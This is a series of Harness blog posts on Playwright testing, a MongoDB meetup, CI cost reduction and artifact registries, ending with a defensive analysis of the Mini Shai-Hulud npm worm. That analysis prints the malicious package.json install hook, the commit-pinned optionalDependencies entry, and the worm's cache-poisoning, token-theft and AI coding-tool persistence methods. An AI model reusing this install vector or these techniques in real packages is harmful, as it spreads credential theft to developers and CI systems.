When Playwright runs locally, one developer's test results are invisible to the rest of the team. Failures get investigated in isolation. Patterns go unnoticed. Knowledge stays siloed.
On Harness, every execution is visible to every developer. Teams can review each other's test runs, spot recurring failures together, and build a shared understanding of test health across the entire suite.
Test results are connected to the commit that triggered them and the deployment they validated. When something breaks in production, you can trace back through the exact test run, the exact code change, and the exact environment, all in one place.
Most external test execution services solve one problem well: running browsers at scale. But they leave you to stitch together the rest. CI integration, reporting, triage, and quality gating are your responsibility.
With native pipeline integration:
This isn't about choosing between scripted tests and AI. It's about using each where it's strongest.
Playwright delivers the reliable, repeatable execution your Harness CI/CD pipeline demands. Harness AI layers intelligence on top: triaging failures so you don't waste cycles investigating, generating assertions that would be painful to hand-code, and eventually creating new test cases from your requirements and code.
Bring your Playwright suite to Harness AI Test Automation. Connect your repo, point us at your project root, and run your first execution in minutes -- with AI failure triage included.
Interested in trying this out? Reach out to ait-interest@harness.io.
Q1: Can I use my existing playwright.config without changes? Yes. Harness reads your existing playwright.config, spec files, and package.json scripts directly from your repo. No migration, no wrapper config, no reformatting. Point Harness at your project root and your suite runs as-is.
Q2: How does Harness handle flaky Playwright tests? When a test fails, Harness automatically classifies the failure — regression, flaky, performance, or environment issue — and surfaces the likely root cause alongside a recommended fix. Instead of sifting through raw logs, engineers see a verdict on whether the failure is real before they spend time investigating it.
Q3: Do I need to manage browser infrastructure or Docker images? No. Harness runs your Playwright suite in the cloud with parallel workers. Browser dependencies, Docker images, shard configuration, and compute scaling are all handled by the platform. For applications behind a firewall, secure tunnels support private app testing without exposing your network.
Q4: How is this different from BrowserStack or LambdaTest? External test grids solve browser execution at scale but leave CI integration, failure triage, and quality gating to you. With Harness, test results live natively in your pipeline, failures automatically block deployments, and AI triage is built in — no separate observability tool or custom webhook configuration required.
Q5: Can I add AI-powered assertions to my existing Playwright scripts? Yes, via the Harness SDK. You can add natural-language assertions directly into your existing Playwright scripts — things like "is the checkout flow in a valid state?" or "does this error message make sense for this scenario?" — without complex selector logic or brittle pixel comparisons. Your scripts stay in Playwright; the assertions just get smarter.


On May 16th, 2026, inspired by the growing MongoDB and DevOps community in Bengaluru, we partnered with the Namma MUG community to bring together engineers exploring automation, CI/CD, Infrastructure as Code, and database migration strategies for modern applications. We at Harness had been looking forward to this for a long time: our first Database DevOps community event in India, focused on MongoDB and modern database automation practices.
The event was a deep dive for experts into how database automation can work with MongoDB easily, without needing manual steps.

My session on the OSS Native Mongo Executor initiative was attended by several engineers already using tools like Liquibase, Flyway, and ORM-driven migration workflows. That led to incredibly valuable conversations around what Database DevOps should look like for MongoDB-native environments.
Interestingly, many attendees wanted to understand:
We also had several deep discussions around CI/CD production rollout strategies and the differences between native Mongo execution and traditional relational migration engines.
These discussions were incredibly insightful because they showed that teams are no longer thinking only about “Database Scripts” - they are thinking about full database delivery workflows integrated into DevOps platforms.
One clear thing we heard throughout all our discussions was how much people want easier ways to get started and more hands-on examples for working with MongoDB DevOps. People kept asking us for simple guides for beginners, real examples of how to set up Continuous Integration and Continuous Delivery (CI/CD), starting templates, and clear steps for moving and rolling back databases from start to finish. We also got into some deep technical talks about handling complex queries, moving databases while they are live, and making sure our deployments are reliable, especially when we talk about advanced ways to undo changes.
A lot of the attendees were really curious about how our MongoDB-native ways of doing migrations are different from the older, traditional database methods. That led us into bigger discussions about why using native MongoDB tools is important, how we manage schema changes in NoSQL, and the unique problems we face with document databases as we move from simple open-source tools to big enterprise-level Database DevOps systems. Overall, the reaction to our new OSS Native Mongo Executor was fantastic! It was clear that people really liked our approach of building Database DevOps features that fit naturally with MongoDB, instead of trying to force old relational rules onto a NoSQL system.
The future of Database DevOps is expanding beyond relational systems, and it’s exciting to see the MongoDB community helping shape that journey with us. A huge thank you to everyone who joined us, especially the speakers and community members who made the event successful: Naveen Kumar, Narendra Gottipati, Pritesh Kiri, and Aripriya Basu.
For us at Harness, this meetup made us realise something important: the community is actively looking for better ways to automate MongoDB operations while maintaining reliability, governance, and developer velocity. We have many more events coming up that you can join; see the Harness Events Calendar.





Continuous integration (CI) costs can escalate quickly as engineering teams scale. While most organizations focus on cloud bills, the true cost of CI includes slow build times, developer wait time, inefficient test execution, and overprovisioned infrastructure.
CI cost optimization is the practice of reducing the total cost of CI pipelines by improving build efficiency, minimizing compute usage, and eliminating unnecessary work without slowing down development.
In this guide, you will learn how to reduce CI costs using four proven strategies: test optimization, intelligent caching, infrastructure right-sizing, and governance controls. Teams that implement these approaches often reduce build times and costs by 50 to 75 percent, while improving developer productivity and feedback cycles.
CI costs extend far beyond your cloud invoice. They include both direct infrastructure expenses and indirect productivity losses.
Research on developer productivity shows that it can take 15 to 25 minutes to recover focus after an interruption. When builds are slow or unreliable, this hidden cost compounds across teams and often exceeds infrastructure spend.
CI costs are primarily driven by four factors:
Understanding these drivers is the first step toward meaningful cost reduction.
Testing is typically the largest contributor to CI runtime and cost. Optimizing test execution delivers the highest return on investment.
Most teams run their full test suite on every commit. This is inefficient, especially in large repositories.
Selective test execution runs only the tests affected by a code change.
Benefits:
For example, large engineering teams using test selection techniques have reduced build times from more than 20 minutes to under five minutes, saving significant developer time.
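As a minimal sketch of selective test execution, the Python below picks only the tests whose dependencies overlap a change. The file names and the `TEST_DEPENDENCIES` mapping are hypothetical; in practice the mapping would come from coverage data or a build graph, and this is not how any particular CI product implements test selection.

```python
# Hypothetical mapping from each test file to the source files it exercises.
# A real system would derive this from coverage data or a build graph.
TEST_DEPENDENCIES = {
    "tests/test_cart.py": {"src/cart.py", "src/pricing.py"},
    "tests/test_checkout.py": {"src/checkout.py", "src/cart.py"},
    "tests/test_search.py": {"src/search.py"},
}


def select_tests(changed_files, test_dependencies):
    """Return the sorted tests affected by the changed files.

    A test is selected when one of its dependencies changed,
    or when the test file itself changed.
    """
    changed = set(changed_files)
    return sorted(
        test
        for test, deps in test_dependencies.items()
        if deps & changed or test in changed
    )
```

A change to `src/cart.py` selects the cart and checkout tests and skips the search tests; a documentation-only change selects nothing.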
Flaky tests are tests that fail intermittently without code changes. They introduce hidden costs:
Industry studies suggest flaky tests consume a measurable portion of engineering productivity.
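One simple way to spot flaky tests follows directly from the definition: look for a test that both passed and failed on the same commit. The sketch below assumes run history is available as `(test_name, commit_sha, passed)` tuples, which is a hypothetical format chosen for illustration.

```python
from collections import defaultdict


def find_flaky_tests(runs):
    """Flag tests that produced both a pass and a failure on the same commit.

    runs: iterable of (test_name, commit_sha, passed) tuples (assumed format).
    """
    outcomes = defaultdict(set)
    for test_name, commit_sha, passed in runs:
        outcomes[(test_name, commit_sha)].add(bool(passed))
    # Two distinct outcomes for one (test, commit) pair means the code did
    # not change but the result did.
    return sorted({test for (test, _), seen in outcomes.items() if len(seen) == 2})
```

A test that fails consistently on one commit, or whose result changes only between commits, is not flagged, since that pattern points to a real regression rather than flakiness.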
Best practices:
Running tests sequentially is inefficient.
Parallelization distributes tests across multiple runners, reducing execution time.
Example:
Parallelization may not significantly reduce total compute usage, but it dramatically reduces developer wait time, which is often the larger cost.
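The trade-off between wall-clock time and compute can be sketched with a greedy longest-first sharding routine. This is one common heuristic, not necessarily what any given CI platform uses, and the test names and durations in the usage note are made up.

```python
import heapq


def shard_tests(durations, num_runners):
    """Greedy longest-first sharding.

    durations: dict of test name -> seconds.
    Returns (shards, wall_time), where wall_time is the busiest runner's load.
    """
    if num_runners < 1:
        raise ValueError("num_runners must be at least 1")
    # Min-heap of (total_seconds, runner_index): least-loaded runner on top.
    heap = [(0.0, i) for i in range(num_runners)]
    shards = [[] for _ in range(num_runners)]
    # Place the longest tests first; break ties by name for determinism.
    for test, seconds in sorted(durations.items(), key=lambda kv: (-kv[1], kv[0])):
        load, idx = heapq.heappop(heap)
        shards[idx].append(test)
        heapq.heappush(heap, (load + seconds, idx))
    wall_time = max(load for load, _ in heap)
    return shards, wall_time
```

With five tests totalling 200 seconds (60, 50, 40, 30, 20), two runners finish in 110 seconds instead of 200. The total compute is still 200 runner-seconds, which is why parallelization mainly buys back developer wait time.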
CI pipelines often repeat the same work, such as downloading dependencies or rebuilding artifacts.
Caching reduces redundant work by reusing previous outputs.
High-impact caching targets include:
An effective caching strategy includes:
In controlled benchmarks, Docker layer caching and dependency reuse have shown significant improvements in build performance.
However, many teams underutilize caching by applying it inconsistently or misconfiguring cache keys.
Key insight:
There is a difference between simply enabling caching and implementing a well-optimized caching strategy.
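Much of that difference comes down to cache keys. A minimal sketch, assuming the key should change only when the dependency inputs change: hash the lockfile contents together with the runtime version. The function name and key layout are illustrative, not a specific platform's convention.

```python
import hashlib


def cache_key(prefix, lockfile_bytes, runtime_version):
    """Build a cache key that changes only when dependency inputs change."""
    digest = hashlib.sha256()
    digest.update(runtime_version.encode("utf-8"))
    digest.update(b"\0")  # separator so the two inputs cannot run together
    digest.update(lockfile_bytes)
    return f"{prefix}-{digest.hexdigest()[:16]}"
```

Keying on the commit SHA instead would miss the cache on every commit, while keying on a constant string would keep serving stale dependencies after the lockfile changes.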
CI workloads are well-suited for cost optimization because they are stateless, short-lived, and parallelizable.
Cloud providers offer spot instances at discounts of up to 90 percent compared to on-demand pricing.
Why they work for CI:
Important nuance:
Retries are usually manageable, but frequent interruptions can impact time-sensitive pipelines.
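A rough way to reason about the retry overhead is a back-of-the-envelope cost model. The sketch below makes a deliberately pessimistic assumption: every interrupted build is rerun once from scratch on spot capacity. The discount and interruption rate in the usage note are illustrative, not measured values.

```python
def expected_spot_cost(on_demand_hourly, discount, build_hours, interruption_rate):
    """Expected cost of one build on spot capacity.

    Assumes an interrupted build is retried once from scratch, so the
    expected work is build_hours * (1 + interruption_rate).
    """
    spot_hourly = on_demand_hourly * (1.0 - discount)
    return spot_hourly * build_hours * (1.0 + interruption_rate)


def on_demand_cost(on_demand_hourly, build_hours):
    """Cost of the same build on on-demand capacity, with no retries."""
    return on_demand_hourly * build_hours
```

For a 30-minute build on a $1.00/hour instance with a 70 percent discount and a 10 percent interruption rate, the model gives about $0.165 per build on spot versus $0.50 on demand. The saving holds up unless interruptions become very frequent.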
Many teams use oversized instances by default.
Right-sizing involves:
This reduces cost without affecting performance.
Static runner pools create inefficiencies:
Auto-scaling allows:
Teams that optimize infrastructure often achieve:
Without guardrails, CI costs tend to increase over time.
Policy as Code enables automated enforcement of cost controls.
Examples:
Tools such as Open Policy Agent are commonly used for this purpose.
You cannot optimize what you cannot measure.
Key metrics include:
Dashboards and analytics help identify inefficiencies and cost drivers.
To reduce CI costs effectively, start with clear metrics.
Establish a baseline and track improvements:
A phased approach helps teams implement changes effectively.
The expected impact is a 30 to 50 percent improvement.
This phase delivers the largest improvements.
This ensures long-term cost control.
These strategies can be implemented manually, but doing so requires significant effort.
Modern CI platforms provide:
This reduces operational overhead and improves consistency.
CI costs do not have to scale with your team size. By focusing on efficiency, you can reduce costs while improving developer experience.
The most effective strategies are:
The key difference is not just tooling but intentional optimization.
Want to reduce CI costs without slowing development?
Explore how modern CI platforms can help optimize test execution, caching, and infrastructure, so your team can build faster while reducing spend.
Developer wait time. Slow builds reduce productivity and increase context switching.
Most teams achieve 30 to 75 percent cost reduction, depending on their starting point.
Yes. CI workloads are well-suited for spot instances, though retries may occasionally occur.
Start with:


Three weeks into a platform modernization project, this question landed in my inbox: "Why does our deployment pipeline take 40 minutes instead of four?"
This is artifact repository sprawl in practice, and it does more than slow pipelines. It fragments your security posture, your compliance evidence, and your ability to answer basic questions like "what's actually running in production right now?"
Modern software delivery pipelines consume and produce artifacts at every stage. A typical microservices application might pull base container images, install language-specific packages, bundle compiled binaries, and push versioned containers, all before a single integration test runs. When each artifact type lives in a separate registry, every pipeline stage authenticates separately, fetches metadata independently, and logs access in disconnected audit systems.
The operational cost compounds quickly. Build jobs that should complete in minutes stall while waiting for credential rotation across four registry providers. Terraform modules reference hardcoded repository URLs that break when teams migrate between vendors. Developers waste hours debugging "works on my machine" issues that trace back to different registries serving different cached versions in CI versus local environments.
Container registry management alone doesn't solve this. You can centralise Docker images perfectly and still have sprawl across Maven Central proxies, PyPI mirrors, and npm registries that each handle authentication, scanning, and access policies differently. The sprawl persists even when every tool works correctly in isolation.
What this actually looks like in a pipeline:
# A typical fragmented pipeline - four different auth mechanisms, four different APIs
stages:
  - name: Pull Base Image
    spec:
      connectorRef: docker_hub_connector   # Registry 1: Docker Hub
      image: node:20-alpine
  - name: Install Dependencies
    spec:
      command: npm install                 # Registry 2: npm registry (or private Verdaccio)
  - name: Build Java Service
    spec:
      command: mvn package                 # Registry 3: Maven Central / Artifactory
  - name: Push Container
    spec:
      connectorRef: ecr_connector          # Registry 4: Amazon ECR
      repo: my-app
      tags: <+pipeline.sequenceId>
Four registries, four sets of credentials to rotate, four places to check when something breaks. Now multiply that by every microservice in your org.
Software supply chain governance requires knowing what entered your build process, who approved it, and whether it matches what shipped to production. Artifact repository sprawl makes that visibility nearly impossible without building custom integration layers that inevitably lag behind the registries they monitor.
Consider a realistic scenario: your security team needs to answer whether a new CVE affects any production workload. With fragmented registries, you're querying Docker Hub for container manifests, Artifactory for Java dependencies, a separate S3 bucket for ML models, and hoping the correlation logic catches every transitive dependency. Miss one registry in the sweep and you've got an incomplete answer. Get the timing wrong and you're correlating artifacts from different build windows.
Unified artifact management changes the equation. When containers, packages, and models flow through a single governance boundary, you can enforce consistent policies at ingestion time rather than auditing violations after deployment. Access control becomes auditable in one place instead of five.
This matters for supply chain attacks targeting package managers, which increasingly exploit the trust developers place in upstream dependencies. When every language ecosystem has its own registry with different security scanning capabilities and policy enforcement mechanisms, attackers optimize for the weakest link. A malicious npm package that wouldn't pass container scanning slips through because the npm registry didn't apply the same controls.
How a unified registry changes incident response:
# Fragmented approach: check each registry separately
1. Query Docker Hub for affected container manifests (minutes)
2. Query Artifactory for affected Java dependencies (minutes)
3. Query npm registry for affected Node packages (minutes)
4. Cross-reference results manually (hours)
5. Hope you didn't miss a registry (uncertainty)
# Consolidated approach: one query, full picture
1. Search artifact registry for component with CVE ID (seconds)
2. View which artifacts contain the dependency (SBOM) (seconds)
3. Check Deployments tab for production exposure (seconds)
4. Full answer with audit trail (confidence)
Platform engineering teams building internal developer portals face a choice: abstract away registry complexity or force application teams to manage it themselves. Neither option works well with artifact sprawl. Abstraction requires maintaining integration code for every registry type, each with different APIs for search, versioning, and access control. Forcing teams to manage it themselves guarantees inconsistent practices and duplicate effort across squads.
The operational burden shows up in unexpected places. Onboarding a new service means provisioning credentials across multiple registries. Rotating secrets means updating pipelines in every repository that publishes or consumes artifacts. And when you need to answer "who pulled what and when" for a compliance audit, you're stitching together logs from disconnected systems with different formats and retention windows.
DevOps toolchain efficiency suffers because fragmented registries create artificial boundaries in automation workflows. Teams end up building brittle orchestration logic that breaks whenever registry APIs change or network partitions separate previously co-located systems.
Running workloads across on-premises data centres and multiple cloud providers amplifies every artifact sprawl problem. Each environment tends to accumulate its own preferred registries: Amazon ECR for AWS workloads, Google Artifact Registry for GCP services, a self-hosted Harbor instance in the data centre. What started as practical deployment choices hardens into infrastructure that's expensive to consolidate and risky to migrate.
Software delivery pipeline consistency becomes nearly impossible. A feature branch tested against artifacts from the on-prem registry might behave differently in production pulling from ECR because different proxy cache timing introduced a version skew. Compliance auditors asking for artifact lineage get stitched-together spreadsheets instead of queryable attestations because no single system has the full picture.
Registry consolidation doesn't mean forcing everything into one physical location. It means establishing a logical control plane that can proxy, cache, and govern artifacts regardless of where they're ultimately stored. The governance layer stays consistent even when artifacts need to live close to compute for latency or compliance reasons.
Harness Artifact Registry was designed to centralise artifact storage and enforce governance across engineering teams dealing with exactly these sprawl problems. It supports 16+ package types natively, including Docker, Helm, Maven, npm, PyPI, NuGet, Go, Cargo, Dart, Swift, RPM, Conda, Hugging Face (for ML models), and generic files, so teams don't need a separate registry for each language ecosystem.
Upstream proxy and caching is where consolidation starts in practice. Instead of every developer and CI job pulling directly from Docker Hub, Maven Central, PyPI, or npm, they pull through Harness AR's proxy layer. The proxy caches artifacts locally, so external registry downtime doesn't break your builds, and every fetch is subject to the same governance policies.
# Before: Direct pulls from multiple external registries
developer laptop --> Docker Hub
CI runner --> Maven Central
CI runner --> npm registry
CI runner --> PyPI
# After: Everything routes through Harness AR upstream proxies
developer laptop --> Harness AR (Docker proxy) --> Docker Hub
CI runner --> Harness AR (Maven proxy) --> Maven Central
CI runner --> Harness AR (npm proxy) --> npm registry
CI runner --> Harness AR (Python proxy) --> PyPI
Upstream proxies are available for all 16+ supported package types, so the governance boundary is genuinely universal rather than limited to containers.
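The pull-through pattern behind an upstream proxy can be sketched in a few lines. This toy class is not the Harness AR implementation: the `fetch_upstream` and `policy` callables are hypothetical stand-ins for a real registry client and a real policy engine.

```python
class PullThroughCache:
    """Toy pull-through proxy: serve from the local cache, else fetch upstream."""

    def __init__(self, fetch_upstream, policy):
        self._fetch_upstream = fetch_upstream  # callable: name -> bytes (assumed)
        self._policy = policy                  # callable: (name, bytes) -> bool (assumed)
        self._cache = {}

    def get(self, name):
        if name in self._cache:
            # Cache hit: the upstream registry is not contacted at all.
            return self._cache[name]
        artifact = self._fetch_upstream(name)
        if not self._policy(name, artifact):
            # Rejected artifacts are never stored locally.
            raise PermissionError(f"{name} blocked by policy")
        self._cache[name] = artifact
        return artifact
```

Once an artifact has been fetched and approved, later requests are served locally even if the upstream registry is unavailable, and every first fetch passes through the same policy check.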
The Dependency Firewall gates what enters your registry from upstream sources. Currently, OPA policies apply only to artifacts fetched through upstream proxies. Direct pushes to hosted registries are not yet subject to Dependency Firewall policies; that capability is coming soon.
For now, governance for direct pushes relies on Security Tests policy sets (Docker/Helm only) or post-ingestion scanning via STO/SCS. There are some built-in policy templates that cover the most common scenarios:
Each evaluation results in one of three statuses: Passed, Warning, or Blocked. Blocked artifacts are never cached in your registry. You can write custom Rego policies beyond the built-in templates.
# Example: Block any npm package published less than 7 days ago
package artifact
deny[msg] {
    input.metadata.published_days_ago < 7
    msg := sprintf("Package %s was published %d days ago (minimum: 7)",
        [input.metadata.name, input.metadata.published_days_ago])
}
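To make the three evaluation statuses concrete, here is a Python sketch that mirrors the age rule above and maps the result to Passed, Warning, or Blocked. The 7-day block threshold comes from the Rego example; the 30-day warning threshold and the function name are assumptions added for illustration and are not part of the Dependency Firewall.

```python
def evaluate_package_age(metadata, block_below_days=7, warn_below_days=30):
    """Return (status, message) for a package based on its publish age.

    metadata: dict with "name" and "published_days_ago", mirroring the
    input.metadata fields used in the Rego example.
    warn_below_days is a hypothetical threshold, not a built-in default.
    """
    name = metadata["name"]
    age = metadata["published_days_ago"]
    if age < block_below_days:
        return "Blocked", (
            f"Package {name} was published {age} days ago "
            f"(minimum: {block_below_days})"
        )
    if age < warn_below_days:
        return "Warning", f"Package {name} is only {age} days old"
    return "Passed", ""
```

A package published 3 days ago is Blocked, one published 10 days ago gets a Warning under the assumed threshold, and one published 90 days ago is Passed.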
Currently, the Dependency Firewall's OPA policies apply to upstream proxy fetches. Support for applying these policies across all registry types, including direct pushes to hosted registries, is coming soon.
Role-based access control provides three pre-built roles (Viewer, Contributor, Admin) that can be assigned to users, user groups, or service accounts at the registry level.
Security scanning and quarantine work through two layers. First, the Dependency Firewall evaluates upstream artifacts against OPA policies at fetch time, blocking anything that fails before it ever enters your registry. Second, for artifacts already in the registry, Harness integrates with Security Testing Orchestration (STO) and Supply Chain Security (SCS) to scan for vulnerabilities and generate SBOMs. Registries can be configured with Security Tests policy sets that evaluate artifacts during ingestion via a scan pipeline (currently supported for Docker and Helm registries). Artifacts that violate policies are automatically quarantined, preventing them from being pulled or used in any downstream pipeline. This requires enabling the relevant policy configuration on your registry.
Quarantine can also be applied manually through the UI on any artifact (three-dot menu > Quarantine), with a required reason for audit purposes. Quarantined artifacts can be released via "Remove from Quarantine" once the issue is resolved.

The artifact details page surfaces security and deployment data directly:
Audit trails are built into the Harness platform. Every artifact action is tracked with the actor, timestamp, and context. You can query these via the UI (Account Settings > Audit Trail, filter by Artifact Registry) or the API.
Teams serious about software supply chain governance end up implementing these controls eventually. Harness AR packages upstream proxy caching, Dependency Firewall, RBAC, security scanning via STO/SCS, and platform-wide audit trails into a single registry that covers the breadth of package types modern engineering teams actually use. The alternative is maintaining a constellation of registry-specific integrations that break whenever vendors deprecate APIs or security requirements tighten.
You can explore the platform or review implementation patterns in the Artifact Registry documentation.
Fixing artifact repository sprawl doesn't require ripping out every existing registry overnight. It requires establishing a control plane that can answer basic questions reliably: what artifacts exist, where they came from, who has access, and what depends on them. Once you have that visibility, you can start enforcing policies consistently and eliminating redundant tooling incrementally.
The teams that move fastest at scale treat artifact management as infrastructure that enables speed rather than a storage problem that needs solving registry by registry. They consolidate governance boundaries, route external dependencies through proxy layers with policy enforcement, and build confidence that what passed security checks is actually what reached production.
If your deployment pipelines feel slower than they should, or your security team struggles to answer supply chain questions confidently, artifact sprawl is worth examining. The operational debt compounds quietly until it doesn't, usually during an incident when you need answers fast and discover your artifact lineage spans five disconnected systems with inconsistent audit logs.
No. Start with upstream proxies (no migration needed), then migrate hosted artifacts incrementally per team/package type.
Harness AR can proxy Artifactory as an upstream source while you migrate, or coexist indefinitely if you need Artifactory-specific features.
No. Harness AR works with any CI/CD tool that can authenticate to a registry. The integrations with Harness CD/STO/SCS are optional add-ons.


Shai-Hulud is back, this time lighter, faster and more automated than before. This new wave, dubbed Mini Shai-Hulud, has affected a number of packages from tanstack, uipath, opensearch-project and mistralai, among others, over the past few weeks. The latest series of major compromises came on 19th May, 2026, hitting the openclaw-cn and antv organizations.
Check an extensive list of affected packages here. This self-propagating software supply-chain worm compromised legitimate high-profile packages with millions of weekly downloads, significantly increasing the potential blast radius. This article details the technical workings, sophisticated propagation mechanism and remediation of this supply-chain attack.
Open-source ecosystems operate on trust. Modern applications routinely pull hundreds of third-party dependencies during development and deployment, often through fully automated CI/CD pipelines. This creates a trust chain as shown below.

Though efficient, this model creates a vast attack surface. Compromising any link in the chain allows attackers to distribute malicious code as a "trusted" update. This is the core idea behind software supply-chain attacks.
In brief, this malware was designed to execute automatically during npm package installation, harvest sensitive credentials from developer systems and CI/CD environments and abuse stolen publishing credentials to release additional malicious package versions. This worm-like propagation mechanism allowed the attack to spread rapidly through trusted package maintainers and automated release pipelines.
What made Mini Shai-Hulud technically more advanced than before was:
The malware propagated through stolen maintainer tokens, GitHub sessions, CI secrets, publishing credentials and developer machines. Once enough maintainers and CI pipelines were infected, the worm jumped laterally across ecosystems. It compromised packages on npm and PyPI, while RubyGems faced a similar attack chain, making the campaign a distributed, ecosystem-wide compromise rather than a single-point attack. As a result, there is no single “ground zero” for Mini Shai-Hulud.
The decentralized and self-propagating nature of the attack also made containment significantly harder as the malware continuously resurfaced through multiple compromised maintainers, registries and CI/CD entry points even weeks after the initial wave, with new exploitation chains still being identified as late as 19th May, 2026. One of the most impactful compromises of the wave, however, emerged through the TanStack attack chain on 11th May, 2026.
September 2025 - The original Shai-Hulud worm hits npm, compromising 200+ packages. It is the first time a supply chain attack runs fully automatically, with no human needed after the initial launch.
December 2025 - An updated version (Shai-Hulud 2.0) appears. It is faster and broader, and starts hitting maintainers from well-known projects like Zapier and Postman.
March 31, 2026 - The axios package gets compromised. One of the most downloaded npm packages in existence. Attackers hijack a maintainer account and sneak in a hidden dependency that runs a malicious script on install. CISA issues an official advisory.
April 29, 2026 - Mini Shai-Hulud emerges, this time targeting SAP's developer ecosystem. Four core SAP packages are poisoned for a few hours. Over 1,000 developers unknowingly hand over their credentials before the packages are pulled.
May 11-12, 2026 - The big one. 172 packages were compromised in 48 hours across npm and PyPI simultaneously. TanStack, Mistral AI, UiPath, OpenSearch are all hit. For the first time, the malicious packages pass provenance verification, meaning even teams doing everything right got affected.
May 12, 2026 - On the same day, RubyGems gets flooded with 500+ malicious packages via bot accounts. New registrations suspended. Everything yanked within 24 hours, but the message is clear: No registry is safe.
May 19, 2026 - The campaign resurfaces again compromising 300+ additional npm packages, including the AntV ecosystem and packages from OpenClaw-CN. The newer variants expanded persistence, stealth and propagation capabilities through GitHub-based fallback C2.
Instead of directly uploading malware to npm using stolen maintainer credentials, the attackers reportedly abused the dangerous pull_request_target trigger. GitHub cache served as the medium for malware delivery. The compromise here occurred at the CI/CD infrastructure layer rather than through a visible malicious commit. Let’s understand the exploit step-by-step.
The attack began from a malicious fork named voicproducoes/router (now deleted), where the attacker pushed an orphaned commit 79ac49eedf774dd4b0cfa308722bc463cfe5885c into the forked tanstack/router repository. The commit itself introduced only two files:
{
  "name": "@tanstack/setup",
  "version": "1.0.0",
  "scripts": {
    "prepare": "bun run tanstack_runner.js && exit 1"
  },
  "dependencies": {
    "bun": "^1.3.13"
  }
}
As we can see, the prepare lifecycle hook runs the payload using bun, so whenever the package @tanstack/setup is installed, the payload is executed automatically.
Now, the attacker opened a malicious pull request #7378 to tanstack/router from another forked repository named zblgg/configuration, triggering the CI workflows of the base repository. The vulnerable workflow among them was bundle-size.yml, which used the dangerous pull_request_target trigger, causing it to run with access to the base repository’s permissions, caches and GitHub Actions identity. The malicious PR contained a seemingly innocent file addition named packages/history/vite_setup.mjs, which maliciously modified the pnpm dependency store inside the GitHub Actions runner during workflow execution.
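A workflow of this shape can be flagged with a simple text heuristic: the file declares the pull_request_target trigger and also references the pull request's head ref or SHA, which usually means it checks out untrusted code. The sketch below is an assumption-laden illustration, not a complete audit. It does not parse YAML, and it will miss workflows that reach PR code by other means.

```python
import re

# Expressions that typically indicate the PR head (attacker-controlled) is used.
HEAD_REFERENCE = re.compile(r"github\.event\.pull_request\.head\.(sha|ref)")


def flags_untrusted_checkout(workflow_text):
    """Heuristic: True if a workflow combines pull_request_target with PR head code."""
    # Drop whole-line comments so commented-out triggers are ignored.
    lines = [
        line for line in workflow_text.splitlines()
        if not line.lstrip().startswith("#")
    ]
    body = "\n".join(lines)
    has_trigger = "pull_request_target" in body
    uses_head = HEAD_REFERENCE.search(body) is not None
    return has_trigger and uses_head
```

A match is a prompt for manual review rather than proof of a vulnerability. A workflow may legitimately use the trigger for labeling or commenting, without ever executing code from the fork.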

Upon workflow completion, actions/cache automatically uploaded the poisoned pnpm store to the shared repository cache. To ensure this malicious entry remained the newest valid cache entry, the attacker repeatedly pushed updates to the PR branch. Finally, to hide traces, the attacker force-pushed the PR branch back to match the main branch HEAD, leaving no visible changes in the PR.
Since GitHub Actions caches are shared across workflows, poisoned artifacts created during the attacker-controlled workflow execution were later restored inside TanStack’s legitimate release workflow defined by release.yml. The attacker’s payload gained execution and extracted GitHub Actions OIDC authentication tokens directly from the runner’s process memory using /proc/<pid>/mem access techniques.
The payload from the poisoned cache then formed the malicious packages by doing the following 2 things:
"optionalDependencies": {
"@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
}
Finally, the trusted yet compromised workflow itself requested valid short-lived npm publishing tokens and published malicious releases directly through the official TanStack CI/CD pipeline, thus carrying valid provenance attestations.
The malicious package was designed so that every installation of an affected TanStack package silently fetched the orphaned commit and executed tanstack_runner.js on developer machines and CI runners. This was combined with the obfuscated payload in router_init.js, a sophisticated multi-stage credential stealer with persistence, exfiltration and self-destruction capabilities. Together, they harvested credentials from developer machines, GitHub Actions runners’ memory and enterprise CI/CD environments by scanning environment variables, configuration files and cloud credentials, among other things.
It also attempted persistence through IDE hooks, VS Code extensions, Claude Code integrations and background services while exfiltrating stolen secrets through Session Protocol CDN or GitHub GraphQL APIs. Finally, upon discovering tokens with package publishing access, the code automatically published additional compromised packages containing the same router_init.js payload and optionalDependencies chain, enabling Mini Shai-Hulud to self-propagate across npm, PyPI and other software ecosystems. Together, this formed the Mini Shai-Hulud worm.
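The two manifest features this chain relies on, an install-time lifecycle script and a dependency resolved straight from a git reference, can be surfaced with a small audit of package.json. The sketch below is a triage heuristic under stated assumptions: the hook list and git prefixes are a reasonable but not exhaustive selection, and both features also appear in plenty of legitimate packages.

```python
import json

# Scripts that npm can run automatically during installation.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
DEPENDENCY_FIELDS = (
    "dependencies",
    "devDependencies",
    "optionalDependencies",
    "peerDependencies",
)
# Version specifiers that resolve from a git host rather than the registry.
GIT_PREFIXES = ("github:", "git+", "git://", "git@")


def audit_manifest(manifest_text):
    """Return a list of findings for one package.json document."""
    manifest = json.loads(manifest_text)
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if command:
            findings.append(f"lifecycle script '{hook}': {command}")
    for field in DEPENDENCY_FIELDS:
        for name, spec in manifest.get(field, {}).items():
            if isinstance(spec, str) and spec.startswith(GIT_PREFIXES):
                findings.append(f"{field} entry '{name}' resolves from git: {spec}")
    return findings
```

Run against the two manifests shown earlier, it reports the prepare script in @tanstack/setup and the github: reference in optionalDependencies. Findings are candidates for review, not verdicts.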
Attacker creates malicious fork (zblgg/configuration)
↓
PR #7378 opened using pull_request_target workflow
↓
Workflow checks out attacker-controlled PR code
↓
Malicious code modifies pnpm dependency store
↓
actions/cache saves poisoned cache to repository cache
↓
Legitimate maintainer later merges normal PR to main
↓
Trusted release workflow restores poisoned pnpm cache
↓
Attacker-injected binaries execute inside official CI runner
↓
Malicious package with router_init.js and optionalDependencies published
↓
Affected package is installed with npm install
↓
prepare hook executes for tanstack/setup
↓
tanstack_runner.js executes from orphaned commit
↓
router_init.js is unpacked and triggered
↓
Environment fingerprinting + token discovery
↓
Credential harvesting + exfiltration
↓
More malicious packages released with Mini Shai-Hulud Payload
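The optionalDependencies entry shown earlier is one of the few indicators in this chain that can be checked mechanically. The following is a minimal sketch, not a scanner: the class and method names are hypothetical, it uses regular expressions rather than a JSON parser, and it assumes the optionalDependencies object contains no nested objects. It flags optional dependencies that resolve to a commit-pinned GitHub reference instead of a registry version. Legitimate projects sometimes use Git dependencies, so a hit is a reason to look closer, not proof of compromise.

```java
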